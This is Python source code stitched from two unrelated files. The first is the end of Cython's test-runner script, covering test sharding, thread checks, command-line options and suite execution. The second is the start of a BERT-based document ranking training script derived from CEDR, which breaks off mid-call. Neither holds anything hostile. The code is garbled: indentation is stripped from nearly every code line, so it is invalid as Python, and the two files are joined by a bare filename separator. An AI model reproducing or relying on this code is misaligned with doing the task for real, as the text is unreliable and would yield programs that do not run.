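# For illustration: string_selector("openmp") returns a RegExSelector that matches any
# test name containing "openmp" (case-insensitive), while string_selector("ticket:123")
# returns a TagsSelector that requires the value "123" in a test's "ticket" tag
# (the selector strings here are only examples).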
class ShardExcludeSelector(object):
# This is an exclude selector so it can override the (include) selectors.
    # It may not provide a uniform distribution (in time or count), but it is a
    # deterministic partition of the tests, which is important.
# Random seed to improve the hash distribution.
_seed = base64.b64decode(b'2ged1EtsGz/GkisJr22UcLeP6n9XIaA5Vby2wM49Wvg=')
def __init__(self, shard_num, shard_count):
self.shard_num = shard_num
self.shard_count = shard_count
def __call__(self, testname, tags=None, _hash=zlib.crc32, _is_py2=IS_PY2):
# Cannot use simple hash() here as shard processes might use different hash seeds.
# CRC32 is fast and simple, but might return negative values in Py2.
hashval = _hash(self._seed + testname) & 0x7fffffff if _is_py2 else _hash(self._seed + testname.encode())
return hashval % self.shard_count != self.shard_num
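# A quick worked sketch (numbers are illustrative): with shard_count=3, a test whose
# salted CRC32 is 14 falls into shard 14 % 3 == 2, so this selector excludes it from
# shards 0 and 1 and keeps it only in shard 2. Every test thus runs in exactly one
# shard, and the assignment is stable across processes because CRC32, unlike hash(),
# does not depend on a per-process hash seed.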
class PendingThreadsError(RuntimeError):
pass
threads_seen = []
def check_thread_termination(ignore_seen=True):
if threading is None: # no threading enabled in CPython
return
current = threading.current_thread()
blocking_threads = []
for t in threading.enumerate():
if not t.is_alive() or t == current or t.name == 'time_stamper':
continue
t.join(timeout=2)
if t.is_alive():
if not ignore_seen:
blocking_threads.append(t)
continue
for seen in threads_seen:
if t is seen:
break
else:
threads_seen.append(t)
blocking_threads.append(t)
if not blocking_threads:
return
sys.stderr.write("warning: left-over threads found after running test:\n")
for t in blocking_threads:
sys.stderr.write('...%s\n' % repr(t))
raise PendingThreadsError("left-over threads found after running test")
def subprocess_output(cmd):
try:
p = subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
return p.communicate()[0].decode('UTF-8')
except OSError:
return ''
def get_version():
from Cython.Compiler.Version import version as cython_version
full_version = cython_version
top = os.path.dirname(os.path.abspath(__file__))
if os.path.exists(os.path.join(top, '.git')):
old_dir = os.getcwd()
try:
os.chdir(top)
head_commit = subprocess_output(['git', 'rev-parse', 'HEAD']).strip()
version_commit = subprocess_output(['git', 'rev-parse', cython_version]).strip()
diff = subprocess_output(['git', 'diff', '--stat']).strip()
if head_commit != version_commit:
full_version += " " + head_commit
if diff:
full_version += ' + uncommitted changes'
finally:
os.chdir(old_dir)
return full_version
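# The resulting string is the plain Cython version (e.g. "0.29.21", an illustrative
# value), optionally followed by the current git commit hash when HEAD differs from the
# release tag, and by " + uncommitted changes" when the working tree has local edits.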
_orig_stdout, _orig_stderr = sys.stdout, sys.stderr
def flush_and_terminate(status):
try:
_orig_stdout.flush()
_orig_stderr.flush()
finally:
os._exit(status)
def main():
global DISTDIR, WITH_CYTHON
# Set an environment variable to the top directory
os.environ['CYTHON_PROJECT_DIR'] = os.path.abspath(os.path.dirname(__file__))
DISTDIR = os.path.join(os.getcwd(), os.path.dirname(sys.argv[0]))
from Cython.Compiler import DebugFlags
args = []
for arg in sys.argv[1:]:
if arg.startswith('--debug') and arg[2:].replace('-', '_') in dir(DebugFlags):
setattr(DebugFlags, arg[2:].replace('-', '_'), True)
else:
args.append(arg)
from optparse import OptionParser
parser = OptionParser()
parser.add_option("--no-cleanup", dest="cleanup_workdir",
action="store_false", default=True,
help="do not delete the generated C files (allows passing --no-cython on next run)")
parser.add_option("--no-cleanup-sharedlibs", dest="cleanup_sharedlibs",
action="store_false", default=True,
help="do not delete the generated shared library files (allows manual module experimentation)")
parser.add_option("--no-cleanup-failures", dest="cleanup_failures",
action="store_false", default=True,
help="enable --no-cleanup and --no-cleanup-sharedlibs for failed tests only")
parser.add_option("--no-cython", dest="with_cython",
action="store_false", default=True,
help="do not run the Cython compiler, only the C compiler")
parser.add_option("--compiler", dest="compiler", default=None,
help="C compiler type")
backend_list = ','.join(BACKENDS)
parser.add_option("--backends", dest="backends", default=backend_list,
help="select backends to test (default: %s)" % backend_list)
parser.add_option("--no-c", dest="use_c",
action="store_false", default=True,
help="do not test C compilation backend")
parser.add_option("--no-cpp", dest="use_cpp",
action="store_false", default=True,
help="do not test C++ compilation backend")
parser.add_option("--no-unit", dest="unittests",
action="store_false", default=True,
help="do not run the unit tests")
parser.add_option("--no-doctest", dest="doctests",
action="store_false", default=True,
help="do not run the doctests")
parser.add_option("--no-file", dest="filetests",
action="store_false", default=True,
help="do not run the file based tests")
parser.add_option("--no-pyregr", dest="pyregr",
action="store_false", default=True,
help="do not run the regression tests of CPython in tests/pyregr/")
parser.add_option("--no-examples", dest="examples",
action="store_false", default=True,
help="Do not run the documentation tests in the examples directory.")
parser.add_option("--no-code-style", dest="code_style",
action="store_false", default=True,
help="Do not run the code style (PEP8) checks.")
parser.add_option("--cython-only", dest="cython_only",
action="store_true", default=False,
help="only compile pyx to c, do not run C compiler or run the tests")
parser.add_option("--no-refnanny", dest="with_refnanny",
action="store_false", default=True,
help="do not regression test reference counting")
parser.add_option("--no-fork", dest="fork",
action="store_false", default=True,
help="do not fork to run tests")
parser.add_option("--sys-pyregr", dest="system_pyregr",
action="store_true", default=False,
help="run the regression tests of the CPython installation")
parser.add_option("-x", "--exclude", dest="exclude",
action="append", metavar="PATTERN",
help="exclude tests matching the PATTERN")
parser.add_option("--listfile", dest="listfile",
action="append",
help="specify a file containing a list of tests to run")
parser.add_option("-j", "--shard_count", dest="shard_count", metavar="N",
type=int, default=1,
help="shard this run into several parallel runs")
parser.add_option("--shard_num", dest="shard_num", metavar="K",
type=int, default=-1,
help="test only this single shard")
parser.add_option("--profile", dest="profile",
action="store_true", default=False,
help="enable profiling of the tests")
parser.add_option("-C", "--coverage", dest="coverage",
action="store_true", default=False,
help="collect source coverage data for the Compiler")
parser.add_option("--coverage-xml", dest="coverage_xml",
action="store_true", default=False,
help="collect source coverage data for the Compiler in XML format")
parser.add_option("--coverage-html", dest="coverage_html",
action="store_true", default=False,
help="collect source coverage data for the Compiler in HTML format")
parser.add_option("-A", "--annotate", dest="annotate_source",
action="store_true", default=True,
help="generate annotated HTML versions of the test source files")
parser.add_option("--no-annotate", dest="annotate_source",
action="store_false",
help="do not generate annotated HTML versions of the test source files")
parser.add_option("-v", "--verbose", dest="verbosity",
action="count", default=0,
help="display test progress, pass twice to print test names")
parser.add_option("-T", "--ticket", dest="tickets",
action="append",
help="a bug ticket number to run the respective test in 'tests/*'")
parser.add_option("-k", dest="only_pattern",
help="a regex pattern for selecting doctests and test functions in the test modules")
parser.add_option("-3", dest="language_level",
action="store_const", const=3, default=2,
help="set language level to Python 3 (useful for running the CPython regression tests)'")
parser.add_option("--xml-output", dest="xml_output_dir", metavar="DIR",
help="write test results in XML to directory DIR")
parser.add_option("--exit-ok", dest="exit_ok", default=False,
action="store_true",
help="exit without error code even on test failures")
parser.add_option("--failfast", dest="failfast", default=False,
action="store_true",
help="stop on first failure or error")
parser.add_option("--root-dir", dest="root_dir", default=os.path.join(DISTDIR, 'tests'),
help=("Directory to look for the file based "
"tests (the ones which are deactivated with '--no-file'."))
parser.add_option("--examples-dir", dest="examples_dir",
default=os.path.join(DISTDIR, 'docs', 'examples'),
help="Directory to look for documentation example tests")
parser.add_option("--work-dir", dest="work_dir", default=os.path.join(os.getcwd(), 'TEST_TMP'),
help="working directory")
parser.add_option("--cython-dir", dest="cython_dir", default=os.getcwd(),
help="Cython installation directory (default: use local source version)")
parser.add_option("--debug", dest="for_debugging", default=False, action="store_true",
help="configure for easier use with a debugger (e.g. gdb)")
parser.add_option("--pyximport-py", dest="pyximport_py", default=False, action="store_true",
help="use pyximport to automatically compile imported .pyx and .py files")
parser.add_option("--watermark", dest="watermark", default=None,
help="deterministic generated by string")
parser.add_option("--use_common_utility_dir", default=False, action="store_true")
parser.add_option("--use_formal_grammar", default=False, action="store_true")
parser.add_option("--test_determinism", default=False, action="store_true",
help="test whether Cython's output is deterministic")
parser.add_option("--pythran-dir", dest="pythran_dir", default=None,
help="specify Pythran include directory. This will run the C++ tests using Pythran backend for Numpy")
parser.add_option("--no-capture", dest="capture", default=True, action="store_false",
help="do not capture stdout, stderr in srctree tests. Makes pdb.set_trace interactive")
parser.add_option("--limited-api", dest="limited_api", default=False, action="store_true",
help="Compiles Cython using CPython's LIMITED_API")
options, cmd_args = parser.parse_args(args)
if options.with_cython and sys.version_info[0] >= 3:
sys.path.insert(0, options.cython_dir)
    # the code style checks require recursive glob ('**'), which needs Python 3.5+
if sys.version_info < (3, 5) or cmd_args:
options.code_style = False
WITH_CYTHON = options.with_cython
coverage = None
if options.coverage or options.coverage_xml or options.coverage_html:
if not WITH_CYTHON:
options.coverage = options.coverage_xml = options.coverage_html = False
elif options.shard_num == -1:
print("Enabling coverage analysis")
from coverage import coverage as _coverage
coverage = _coverage(branch=True)
coverage.erase()
coverage.start()
if options.xml_output_dir:
shutil.rmtree(options.xml_output_dir, ignore_errors=True)
if options.listfile:
for listfile in options.listfile:
cmd_args.extend(load_listfile(listfile))
if options.capture and not options.for_debugging:
keep_alive_interval = 10
else:
keep_alive_interval = None
if options.shard_count > 1 and options.shard_num == -1:
if "PYTHONIOENCODING" not in os.environ:
# Make sure subprocesses can print() Unicode text.
os.environ["PYTHONIOENCODING"] = sys.stdout.encoding or sys.getdefaultencoding()
import multiprocessing
pool = multiprocessing.Pool(options.shard_count)
tasks = [(options, cmd_args, shard_num) for shard_num in range(options.shard_count)]
errors = []
# NOTE: create process pool before time stamper thread to avoid forking issues.
total_time = time.time()
stats = Stats()
with time_stamper_thread(interval=keep_alive_interval):
for shard_num, shard_stats, return_code in pool.imap_unordered(runtests_callback, tasks):
if return_code != 0:
errors.append(shard_num)
sys.stderr.write("FAILED (%s/%s)\n" % (shard_num, options.shard_count))
sys.stderr.write("ALL DONE (%s/%s)\n" % (shard_num, options.shard_count))
stats.update(shard_stats)
pool.close()
pool.join()
total_time = time.time() - total_time
sys.stderr.write("Sharded tests run in %d seconds (%.1f minutes)\n" % (round(total_time), total_time / 60.))
if errors:
sys.stderr.write("Errors for shards %s\n" % ", ".join([str(e) for e in errors]))
return_code = 1
else:
return_code = 0
else:
with time_stamper_thread(interval=keep_alive_interval):
_, stats, return_code = runtests(options, cmd_args, coverage)
if coverage:
if options.shard_count > 1 and options.shard_num == -1:
coverage.combine()
coverage.stop()
stats.print_stats(sys.stderr)
if coverage:
save_coverage(coverage, options)
sys.stderr.write("ALL DONE\n")
sys.stderr.flush()
try:
check_thread_termination(ignore_seen=False)
except PendingThreadsError:
# normal program exit won't kill the threads, do it the hard way here
flush_and_terminate(return_code)
else:
sys.exit(return_code)
@contextmanager
def time_stamper_thread(interval=10):
"""
Print regular time stamps into the build logs to find slow tests.
@param interval: time interval in seconds
"""
if not interval or interval < 0:
# Do nothing
yield
return
try:
_xrange = xrange
except NameError:
_xrange = range
import threading
import datetime
from time import sleep
interval = _xrange(interval * 4)
now = datetime.datetime.now
stop = False
# We capture stderr in some places.
# => make sure we write to the real (original) stderr of the test runner.
stderr = os.dup(2)
def write(s):
os.write(stderr, s if type(s) is bytes else s.encode('ascii'))
def time_stamper():
while True:
for _ in interval:
if stop:
return
sleep(1./4)
write('\n#### %s\n' % now())
thread = threading.Thread(target=time_stamper, name='time_stamper')
thread.setDaemon(True) # Py2 ...
thread.start()
try:
yield
finally:
stop = True
thread.join()
os.close(stderr)
def configure_cython(options):
global CompilationOptions, pyrex_default_options, cython_compile
from Cython.Compiler.Options import \
CompilationOptions, \
default_options as pyrex_default_options
from Cython.Compiler.Options import _directive_defaults as directive_defaults
from Cython.Compiler import Errors
Errors.LEVEL = 0 # show all warnings
from Cython.Compiler import Options
Options.generate_cleanup_code = 3 # complete cleanup code
from Cython.Compiler import DebugFlags
DebugFlags.debug_temp_code_comments = 1
pyrex_default_options['formal_grammar'] = options.use_formal_grammar
if options.profile:
directive_defaults['profile'] = True
if options.watermark:
import Cython.Compiler.Version
Cython.Compiler.Version.watermark = options.watermark
def save_coverage(coverage, options):
if options.coverage:
coverage.report(show_missing=0)
if options.coverage_xml:
coverage.xml_report(outfile="coverage-report.xml")
if options.coverage_html:
coverage.html_report(directory="coverage-report-html")
def runtests_callback(args):
options, cmd_args, shard_num = args
options.shard_num = shard_num
return runtests(options, cmd_args)
def runtests(options, cmd_args, coverage=None):
# faulthandler should be able to provide a limited traceback
# in the event of a segmentation fault. Hopefully better than Travis
# just keeping running until timeout. Only available on Python 3.3+
try:
import faulthandler
except ImportError:
pass # OK - not essential
else:
faulthandler.enable()
if sys.platform == "win32" and sys.version_info < (3, 6):
# enable Unicode console output, if possible
try:
import win_unicode_console
except ImportError:
pass
else:
win_unicode_console.enable()
WITH_CYTHON = options.with_cython
ROOTDIR = os.path.abspath(options.root_dir)
WORKDIR = os.path.abspath(options.work_dir)
if WITH_CYTHON:
configure_cython(options)
xml_output_dir = options.xml_output_dir
if options.shard_num > -1:
WORKDIR = os.path.join(WORKDIR, str(options.shard_num))
if xml_output_dir:
xml_output_dir = os.path.join(xml_output_dir, 'shard-%03d' % options.shard_num)
# RUN ALL TESTS!
UNITTEST_MODULE = "Cython"
UNITTEST_ROOT = os.path.join(os.path.dirname(__file__), UNITTEST_MODULE)
if WITH_CYTHON:
if os.path.exists(WORKDIR):
for path in os.listdir(WORKDIR):
if path in ("support", "Cy3"): continue
shutil.rmtree(os.path.join(WORKDIR, path), ignore_errors=True)
if not os.path.exists(WORKDIR):
os.makedirs(WORKDIR)
if options.shard_num <= 0:
sys.stderr.write("Python %s\n" % sys.version)
sys.stderr.write("\n")
if WITH_CYTHON:
sys.stderr.write("Running tests against Cython %s\n" % get_version())
else:
sys.stderr.write("Running tests without Cython.\n")
if options.for_debugging:
options.cleanup_workdir = False
options.cleanup_sharedlibs = False
options.fork = False
if WITH_CYTHON and include_debugger:
from Cython.Compiler.Options import default_options as compiler_default_options
compiler_default_options['gdb_debug'] = True
compiler_default_options['output_dir'] = os.getcwd()
if IS_PYPY:
if options.with_refnanny:
sys.stderr.write("Disabling refnanny in PyPy\n")
options.with_refnanny = False
if options.with_refnanny:
from pyximport.pyxbuild import pyx_to_dll
libpath = pyx_to_dll(os.path.join("Cython", "Runtime", "refnanny.pyx"),
build_in_temp=True,
pyxbuild_dir=os.path.join(WORKDIR, "support"))
sys.path.insert(0, os.path.split(libpath)[0])
CFLAGS.append("-DCYTHON_REFNANNY=1")
if options.limited_api:
CFLAGS.append("-DCYTHON_LIMITED_API=1")
CFLAGS.append('-Wno-unused-function')
if xml_output_dir and options.fork:
# doesn't currently work together
sys.stderr.write("Disabling forked testing to support XML test output\n")
options.fork = False
if WITH_CYTHON:
sys.stderr.write("Using Cython language level %d.\n" % options.language_level)
test_bugs = False
if options.tickets:
for ticket_number in options.tickets:
test_bugs = True
cmd_args.append('ticket:%s' % ticket_number)
if not test_bugs:
for selector in cmd_args:
if selector.startswith('bugs'):
test_bugs = True
selectors = [ string_selector(r) for r in cmd_args ]
verbose_excludes = selectors or options.verbosity >= 2
if not selectors:
selectors = [ lambda x, tags=None: True ]
# Check which external modules are not present and exclude tests
    # which depend on them (by prefix)
missing_dep_excluder = MissingDependencyExcluder(EXT_DEP_MODULES)
version_dep_excluder = VersionDependencyExcluder(VER_DEP_MODULES)
exclude_selectors = [missing_dep_excluder, version_dep_excluder] # want to print msg at exit
try:
import IPython.core.release
if list(IPython.core.release._ver) < [1, 0, 0]:
raise ImportError
except (ImportError, AttributeError, TypeError):
exclude_selectors.append(RegExSelector('IPython'))
try:
raise ImportError("Jedi typer is currently broken, see GH#1845")
import jedi
if not ([0, 9] <= list(map(int, re.findall('[0-9]+', jedi.__version__ or '0')))):
raise ImportError
except (ImportError, AttributeError, TypeError):
exclude_selectors.append(RegExSelector('Jedi'))
if options.exclude:
exclude_selectors += [ string_selector(r) for r in options.exclude ]
if not COMPILER_HAS_INT128 or not IS_CPYTHON:
exclude_selectors += [RegExSelector('int128')]
if options.shard_num > -1:
exclude_selectors.append(ShardExcludeSelector(options.shard_num, options.shard_count))
if not test_bugs:
bug_files = [
('bugs.txt', True),
('pypy_bugs.txt', IS_PYPY),
('pypy2_bugs.txt', IS_PYPY and IS_PY2),
('pypy_crash_bugs.txt', IS_PYPY),
('pypy_implementation_detail_bugs.txt', IS_PYPY),
('limited_api_bugs.txt', options.limited_api),
('windows_bugs.txt', sys.platform == 'win32'),
('cygwin_bugs.txt', sys.platform == 'cygwin')
]
exclude_selectors += [
FileListExcluder(os.path.join(ROOTDIR, bugs_file_name),
verbose=verbose_excludes)
for bugs_file_name, condition in bug_files if condition
]
global COMPILER
if options.compiler:
COMPILER = options.compiler
selected_backends = [ name.strip() for name in options.backends.split(',') if name.strip() ]
backends = []
for backend in selected_backends:
if backend == 'c' and not options.use_c:
continue
elif backend == 'cpp' and not options.use_cpp:
continue
elif backend not in BACKENDS:
sys.stderr.write("Unknown backend requested: '%s' not one of [%s]\n" % (
backend, ','.join(BACKENDS)))
sys.exit(1)
backends.append(backend)
if options.shard_num <= 0:
sys.stderr.write("Backends: %s\n" % ','.join(backends))
languages = backends
if 'TRAVIS' in os.environ and sys.platform == 'darwin' and 'cpp' in languages:
bugs_file_name = 'travis_macos_cpp_bugs.txt'
exclude_selectors += [
FileListExcluder(os.path.join(ROOTDIR, bugs_file_name),
verbose=verbose_excludes)
]
if options.use_common_utility_dir:
common_utility_dir = os.path.join(WORKDIR, 'utility_code')
if not os.path.exists(common_utility_dir):
os.makedirs(common_utility_dir)
else:
common_utility_dir = None
sys.stderr.write("\n")
test_suite = unittest.TestSuite()
stats = Stats()
if options.unittests:
collect_unittests(UNITTEST_ROOT, UNITTEST_MODULE + ".", test_suite, selectors, exclude_selectors)
if options.doctests:
collect_doctests(UNITTEST_ROOT, UNITTEST_MODULE + ".", test_suite, selectors, exclude_selectors)
if options.filetests and languages:
filetests = TestBuilder(ROOTDIR, WORKDIR, selectors, exclude_selectors,
options, options.pyregr, languages, test_bugs,
options.language_level, common_utility_dir,
options.pythran_dir, add_embedded_test=True, stats=stats)
test_suite.addTest(filetests.build_suite())
if options.examples and languages:
examples_workdir = os.path.join(WORKDIR, 'examples')
for subdirectory in glob.glob(os.path.join(options.examples_dir, "*/")):
filetests = TestBuilder(subdirectory, examples_workdir, selectors, exclude_selectors,
options, options.pyregr, languages, test_bugs,
options.language_level, common_utility_dir,
options.pythran_dir,
default_mode='compile', stats=stats)
test_suite.addTest(filetests.build_suite())
if options.system_pyregr and languages:
sys_pyregr_dir = os.path.join(sys.prefix, 'lib', 'python'+sys.version[:3], 'test')
if not os.path.isdir(sys_pyregr_dir):
sys_pyregr_dir = os.path.join(os.path.dirname(sys.executable), 'Lib', 'test') # source build
if os.path.isdir(sys_pyregr_dir):
filetests = TestBuilder(ROOTDIR, WORKDIR, selectors, exclude_selectors,
options, True, languages, test_bugs,
sys.version_info[0], common_utility_dir, stats=stats)
sys.stderr.write("Including CPython regression tests in %s\n" % sys_pyregr_dir)
test_suite.addTest(filetests.handle_directory(sys_pyregr_dir, 'pyregr'))
if options.code_style and options.shard_num <= 0:
try:
import pycodestyle
except ImportError:
# Hack to make the exclusion visible.
missing_dep_excluder.tests_missing_deps.append('TestCodeFormat')
else:
test_suite.addTest(TestCodeFormat(options.cython_dir))
if xml_output_dir:
from Cython.Tests.xmlrunner import XMLTestRunner
if not os.path.exists(xml_output_dir):
try:
os.makedirs(xml_output_dir)
except OSError:
pass # concurrency issue?
test_runner = XMLTestRunner(output=xml_output_dir,
verbose=options.verbosity > 0)
if options.failfast:
sys.stderr.write("--failfast not supported with XML runner\n")
else:
text_runner_options = {}
if options.failfast:
text_runner_options['failfast'] = True
test_runner = unittest.TextTestRunner(verbosity=options.verbosity, **text_runner_options)
if options.pyximport_py:
from pyximport import pyximport
pyximport.install(pyimport=True, build_dir=os.path.join(WORKDIR, '_pyximport'),
load_py_module_on_import_failure=True, inplace=True)
try:
gc.set_debug(gc.DEBUG_UNCOLLECTABLE)
except AttributeError:
pass # not available on PyPy
result = test_runner.run(test_suite)
if common_utility_dir and options.shard_num < 0 and options.cleanup_workdir:
shutil.rmtree(common_utility_dir)
if missing_dep_excluder.tests_missing_deps:
sys.stderr.write("Following tests excluded because of missing dependencies on your system:\n")
for test in missing_dep_excluder.tests_missing_deps:
sys.stderr.write(" %s\n" % test)
if options.with_refnanny:
import refnanny
sys.stderr.write("\n".join([repr(x) for x in refnanny.reflog]))
if options.exit_ok:
return options.shard_num, stats, 0
else:
return options.shard_num, stats, not result.wasSuccessful()
if __name__ == '__main__':
try:
main()
except Exception:
traceback.print_exc()
try:
check_thread_termination(ignore_seen=False)
except PendingThreadsError:
# normal program exit won't kill the threads, do it the hard way here
flush_and_terminate(1)
sys.exit(1)
|
train.py
|
#!/usr/bin/env python
#
# This code is based on CEDR: https://github.com/Georgetown-IR-Lab/cedr
# It has some modifications/extensions and it relies on our custom BERT
# library: https://github.com/searchivarius/pytorch-pretrained-BERT-mod
# (c) Georgetown IR lab & Carnegie Mellon University
# It's distributed under the MIT License
# MIT License is compatible with Apache 2 license for the code in this repo.
#
import os
import time
import gc
import sys
import math
import json
import argparse
import torch
import torch.distributed as dist
sys.path.append('.')
import scripts.utils as utils
import scripts.cedr.data as data
from scripts.cedr.model_init_utils import MODEL_PARAM_PREF
import scripts.cedr.model_init_utils as model_init_utils
from scripts.common_eval import METRIC_LIST, readQrelsDict, readRunDict, getEvalResults
from scripts.config import DEVICE_CPU
from tqdm import tqdm
from collections import namedtuple
from multiprocessing import Process
from threading import BrokenBarrierError
from multiprocessing import Barrier
# 5 minutes should be more than enough while waiting
# for other processes to reach the same training point
BARRIER_WAIT_MODEL_AVERAGE_TIMEOUT=60*5
# However (see the comment below), we need to wait longer for validation to complete.
# Let's optimistically assume it takes no more than four hours, but this might need
# to be revisited in the future; a proper fix should make validation use all GPUs.
BARRIER_WAIT_VALIDATION_TIMEOUT=60*240
OPT_SGD='sgd'
OPT_ADAMW='adamw'
# Important: all the losses should have a reduction type sum!
class MarginRankingLossWrapper:
    '''This is a wrapper class for the margin ranking loss.
    It expects that positive/negative scores are arranged in pairs.'''
    @staticmethod
    def name():
        return 'pairwise_margin'
def __init__(self, margin):
self.loss = torch.nn.MarginRankingLoss(margin, reduction='sum')
def compute(self, scores):
pos_doc_scores = scores[:, 0]
neg_doc_scores = scores[:, 1]
ones = torch.ones_like(pos_doc_scores)
return self.loss.forward(pos_doc_scores, neg_doc_scores, target=ones)
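        # With target=ones and reduction='sum', this evaluates to
        # sum_i max(0, margin - (pos_i - neg_i)): a pair stops contributing once the
        # positive document outscores the negative one by at least `margin`.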
class PairwiseSoftmaxLoss:
    '''This is a wrapper class for the pairwise softmax ranking loss.
    It expects that positive/negative scores are arranged in pairs.'''
    @staticmethod
    def name():
        return 'pairwise_softmax'
def compute(self, scores):
return torch.sum(1. - scores.softmax(dim=1)[:, 0]) # pairwise softmax
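        # Note: 1 - softmax(scores)[:, 0] equals exp(s_neg) / (exp(s_pos) + exp(s_neg)),
        # i.e. sigmoid(s_neg - s_pos), the probability assigned to the *wrong* ordering
        # of the pair, summed over all pairs in the batch.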
LOSS_FUNC_LIST = [PairwiseSoftmaxLoss.name(), MarginRankingLossWrapper.name()]
TrainParams = namedtuple('TrainParams',
['optim',
'init_lr', 'init_bert_lr', 'epoch_lr_decay', 'weight_decay',
'momentum',
'warmup_pct', 'batch_sync_qty',
'batches_per_train_epoch',
'batch_size', 'batch_size_val',
'max_query_len', 'max_doc_len',
'backprop_batch_size',
'epoch_qty',
'save_epoch_snapshots', 'save_last_snapshot_every_k_batch',
'device_name', 'print_grads',
'shuffle_train',
'use_external_eval', 'eval_metric'])
def avg_model_params(model):
"""Average model parameters across all GPUs."""
qty = float(dist.get_world_size())
for prm in model.parameters():
dist.all_reduce(prm.data, op=torch.distributed.ReduceOp.SUM)
prm.data /= qty
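# In effect, every parameter tensor is replaced by its element-wise mean over all
# workers: all_reduce with ReduceOp.SUM adds up the per-GPU copies in place on every
# process, and dividing by the world size turns that sum into an average.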
def clean_memory(device_name):
utils.sync_out_streams()
    print('\nClearing memory on device:', device_name)
utils.sync_out_streams()
gc.collect()
if device_name != DEVICE_CPU:
with torch.cuda.device(device_name):
torch.cuda.empty_cache()
def get_lr_desc(optimizer):
lr_arr = ['LRs:']
for param_group in optimizer.param_groups:
lr_arr.append('%.6f' % param_group['lr'])
return ' '.join(lr_arr)
class ValidationTimer:
def __init__(self, validation_checkpoints):
self.validation_checkpoints = sorted(validation_checkpoints)
self.pointer = 0
self.total_steps = 0
def is_time(self):
if self.pointer >= len(self.validation_checkpoints):
return False
if self.total_steps >= self.validation_checkpoints[self.pointer]:
self.pointer += 1
return True
return False
def last_checkpoint(self):
return self.validation_checkpoints[self.pointer - 1]
def increment(self, steps_qty):
self.total_steps += steps_qty
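# Usage sketch (checkpoint values are illustrative): ValidationTimer([1000, 5000]) with
# increment() called after every batch makes is_time() return True exactly once when the
# running total first reaches 1000 training pairs and once more at 5000, after which
# last_checkpoint() reports the threshold that was just crossed.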
def train_iteration(model, sync_barrier,
is_master_proc, device_qty,
loss_obj,
train_params, max_train_qty,
valid_run, valid_qrel_filename,
optimizer, scheduler,
dataset, train_pairs, qrels,
validation_timer, valid_run_dir, valid_scores_holder,
save_last_snapshot_every_k_batch,
model_out_dir):
clean_memory(train_params.device_name)
model.train()
total_loss = 0.
    # This is the total number of records processed; it can differ from
    # the total number of training pairs.
    total_prev_qty = total_qty = 0.
batch_size = train_params.batch_size
optimizer.zero_grad()
if train_params.print_grads:
print('Gradient sums before training')
for k, v in model.named_parameters():
print(k, 'None' if v.grad is None else torch.sum(torch.norm(v.grad, dim=-1, p=2)))
lr_desc = get_lr_desc(optimizer)
batch_id = 0
snap_id = 0
if is_master_proc:
utils.sync_out_streams()
        pbar = tqdm(desc='training', total=max_train_qty, ncols=80, leave=False)
else:
pbar = None
for record in data.iter_train_pairs(model, train_params.device_name, dataset, train_pairs, train_params.shuffle_train,
qrels, train_params.backprop_batch_size,
train_params.max_query_len, train_params.max_doc_len):
scores = model(record['query_tok'],
record['query_mask'],
record['doc_tok'],
record['doc_mask'])
count = len(record['query_id']) // 2
scores = scores.reshape(count, 2)
loss = loss_obj.compute(scores)
loss.backward()
total_qty += count
if train_params.print_grads:
print(f'Records processed {total_qty} Gradient sums:')
for k, v in model.named_parameters():
print(k, 'None' if v.grad is None else torch.sum(torch.norm(v.grad, dim=-1, p=2)))
total_loss += loss.item()
if total_qty - total_prev_qty >= batch_size:
if is_master_proc:
validation_timer.increment(total_qty - total_prev_qty)
#print(total, 'optimizer step!')
optimizer.step()
optimizer.zero_grad()
total_prev_qty = total_qty
# Scheduler must make a step in each batch! *AFTER* the optimizer makes an update!
if scheduler is not None:
scheduler.step()
lr_desc = get_lr_desc(optimizer)
# This must be done in every process, not only in the master process
if device_qty > 1:
if batch_id % train_params.batch_sync_qty == 0:
try:
sync_barrier.wait(BARRIER_WAIT_MODEL_AVERAGE_TIMEOUT)
except BrokenBarrierError:
raise Exception('A model parameter synchronization timeout!')
avg_model_params(model)
batch_id += 1
# We will surely skip batch_id == 0
if save_last_snapshot_every_k_batch is not None and batch_id % save_last_snapshot_every_k_batch == 0:
if is_master_proc:
os.makedirs(model_out_dir, exist_ok=True)
out_tmp = os.path.join(model_out_dir, f'model.last.{snap_id}')
torch.save(model, out_tmp)
snap_id += 1
if pbar is not None:
pbar.update(count)
pbar.refresh()
utils.sync_out_streams()
pbar.set_description('%s train loss %.5f' % (lr_desc, total_loss / float(total_qty)) )
while is_master_proc and validation_timer.is_time() and valid_run_dir is not None:
model.eval()
os.makedirs(valid_run_dir, exist_ok=True)
run_file_name = os.path.join(valid_run_dir, f'batch_{validation_timer.last_checkpoint()}.run')
pbar.refresh()
utils.sync_out_streams()
score = validate(model, train_params, dataset,
valid_run,
qrelf=valid_qrel_filename, run_filename=run_file_name)
pbar.refresh()
utils.sync_out_streams()
print(f'\n# of batches={validation_timer.total_steps} score={score:.4g}')
valid_scores_holder[f'batch_{validation_timer.last_checkpoint()}'] = score
utils.save_json(os.path.join(valid_run_dir, "scores.log"), valid_scores_holder)
model.train()
if total_qty >= max_train_qty:
break
# Final model averaging in the end.
if device_qty > 1:
try:
sync_barrier.wait(BARRIER_WAIT_MODEL_AVERAGE_TIMEOUT)
except BrokenBarrierError:
raise Exception('A model parameter synchronization timeout!')
avg_model_params(model)
if pbar is not None:
pbar.close()
utils.sync_out_streams()
return total_loss / float(total_qty)
def validate(model, train_params, dataset, orig_run, qrelf, run_filename):
"""Model validation step:
1. Re-rank a given run
2. Save the re-ranked run
3. Evaluate results
:param model: a model reference.
:param train_params: training parameters
:param dataset: validation dataset
:param orig_run: a run to re-rank
:param qrelf: QREL files
:param run_filename: a file name to store the *RE-RANKED* run
:return:
"""
utils.sync_out_streams()
rerank_run = run_model(model, train_params, dataset, orig_run)
eval_metric = train_params.eval_metric
utils.sync_out_streams()
print(f'\nEvaluating run with QREL file {qrelf} using metric {eval_metric}')
utils.sync_out_streams()
# Let us always save the run
return getEvalResults(useExternalEval=train_params.use_external_eval,
evalMetric=eval_metric,
rerankRun=rerank_run,
qrelFile=qrelf,
runFile=run_filename)
def run_model(model, train_params, dataset, orig_run, desc='valid'):
rerank_run = {}
clean_memory(train_params.device_name)
with torch.no_grad(), \
tqdm(total=sum(len(r) for r in orig_run.values()), ncols=80, desc=desc, leave=False) as pbar:
model.eval()
d = {}
for records in data.iter_valid_records(model,
train_params.device_name,
dataset, orig_run,
train_params.batch_size_val,
train_params.max_query_len, train_params.max_doc_len):
scores = model(records['query_tok'],
records['query_mask'],
records['doc_tok'],
